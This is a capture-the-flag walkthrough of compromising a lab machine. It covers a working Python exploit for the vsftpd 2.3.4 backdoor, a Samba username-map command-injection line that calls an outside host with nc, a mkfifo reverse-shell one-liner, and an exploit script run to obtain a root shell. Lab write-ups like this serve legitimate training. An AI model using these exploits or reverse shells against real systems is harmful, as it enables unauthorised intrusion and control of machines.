Scanning
sudo nmap -A -T4 -v -p- 10.10.10.3 -oA scans/scan
Open ports:
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
22 SSH, 21 FTP, 139/445 SMB
Anonymous login via FTP?
Nothing in the FTP server; let's check the service versions instead.
Vulnerability Analysis
Searchsploit for this version?
searchsploit vsftp 2.3.4
Looks like RCE via CVE-2011-2523 (the vsftpd 2.3.4 backdoor).
Let's try it.
It's hanging. Can we do it manually? Let's review the code.
The backdoor is opened by logging in with a username that contains the string :) (the password can be anything), for example
user: nergal:)
password: pass
Once you do, the daemon starts listening on TCP port 6200 and hands anyone who connects there a shell. The FTP control connection never gets a reply to PASS, so don't wait for one: just connect to 6200.
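The exchange above, as an added example written for this writeup (it is not the Metasploit module or the scripts the writeup ran). The FTP conversation is kept in send_trigger(), which takes any connected socket-like object so it can be exercised offline against FakeVsftpd, a constructed stand-in for the backdoored daemon's control channel; exploit() wires it to real sockets. The username "nergal" and password "pass" are the writeup's values and are arbitrary.

```python
"""vsftpd 2.3.4 backdoor (CVE-2011-2523) trigger: illustration for this writeup,
not the Metasploit module or the exploit scripts the writeup used."""
import socket

FTP_PORT = 21
BACKDOOR_PORT = 6200
TRIGGER = ":)"   # bytes 0x3a 0x29: the backdoored str.c calls vsf_sysutil_extra() on them


def trigger_username(base="nergal"):
    """Any username containing ':)' works; the rest of the name does not matter."""
    return base + TRIGGER


def send_trigger(ftp, username="nergal:)", password="pass"):
    """Speak just enough FTP on a connected socket-like object to fire the backdoor.

    Returns (banner, reply_to_user, lines_sent). The daemon answers USER with 331 but
    never answers PASS: the PASS handler ends up in vsf_sysutil_extra(), an endless
    bind/listen/accept loop on port 6200 inside the same process. So we send PASS and
    deliberately do not read a reply.
    """
    banner = ftp.recv(1024).decode(errors="replace")
    sent = []
    line = f"USER {username}\r\n"
    ftp.sendall(line.encode())
    sent.append(line)
    reply = ftp.recv(1024).decode(errors="replace")
    if not reply.startswith("331"):
        # e.g. 530 on anonymous-only servers: the backdoored code path is never reached
        raise RuntimeError(f"unexpected reply to USER, backdoor not reachable: {reply!r}")
    line = f"PASS {password}\r\n"
    ftp.sendall(line.encode())
    sent.append(line)
    return banner, reply, sent


def exploit(host, command="id", timeout=5):
    """Trigger the backdoor over the network and run one command via port 6200.

    Returns the command output, or None if nothing is listening on 6200 afterwards
    (unbackdoored build, or the port is filtered between you and the target)."""
    ftp = socket.create_connection((host, FTP_PORT), timeout=timeout)
    send_trigger(ftp, trigger_username(), "pass")
    try:
        shell = socket.create_connection((host, BACKDOOR_PORT), timeout=timeout)
    except OSError:
        ftp.close()
        return None
    out = b""
    with shell:
        shell.sendall((command + "\n").encode())
        try:
            while True:
                chunk = shell.recv(4096)
                if not chunk:
                    break
                out += chunk
        except socket.timeout:
            pass          # /bin/sh on the other end stays open; we just stop reading
    ftp.close()
    return out.decode(errors="replace")


class FakeVsftpd:
    """Constructed stand-in for the backdoored daemon's control channel (offline demo).

    Replies with the real 220/331 strings, then raises timeout on the next read, which
    is exactly what a real backdoored daemon does after PASS."""

    def __init__(self, anonymous_only=False):
        self.replies = [b"220 (vsFTPd 2.3.4)\r\n"]
        self.replies.append(b"530 This FTP server is anonymous only.\r\n" if anonymous_only
                            else b"331 Please specify the password.\r\n")
        self.sent = []

    def recv(self, n):
        if self.replies:
            return self.replies.pop(0)
        raise socket.timeout("no reply: daemon is inside vsf_sysutil_extra()")

    def sendall(self, data):
        self.sent.append(data)


def demo():
    """Offline run of the trigger against the fake daemon; returns the lines sent."""
    fake = FakeVsftpd()
    _, _, sent = send_trigger(fake, trigger_username(), "pass")
    return sent


if __name__ == "__main__":
    for line in demo():
        print(repr(line))
```

The offline demo only proves the control-channel exchange; against a live host the result of exploit() tells you whether 6200 actually opened, which is the check to make before assuming the backdoor code is present.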
Let's try it.
Not working. Different script?
Still not working. SMB is also open; let's see what shares a null session can access.
Hmm, /tmp???
Nothing in these files. Let's check the Samba version.
Looks like we have command execution via a Metasploit module (Samba "username map script", CVE-2007-2447). Let's read the code and try it manually.
“By specifying a username containing shell meta characters, attackers can execute arbitrary commands.”
Let's look for a Python version.
This is easier for me to understand.
We can execute a command by putting it after the shell metacharacters in the username. Let's try.
That worked!
Exploitation
smbclient -U '/=`nohup nc 10.10.14.25 443 `' //10.10.10.3/tmp
Now that we know it's executing, let's change it to a reverse shell.
Going to use this one, but execute it with curl.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 443 >/tmp/f
I was having issues executing commands because the first command was getting capitalized.
I reverted to using a pre-built Python script I found here:
python3 expl.py 10.10.10.3 139 10.10.14.25 443
And we have a root shell.
Flag
767818ef14facd01a9e270c3ec6bbcf8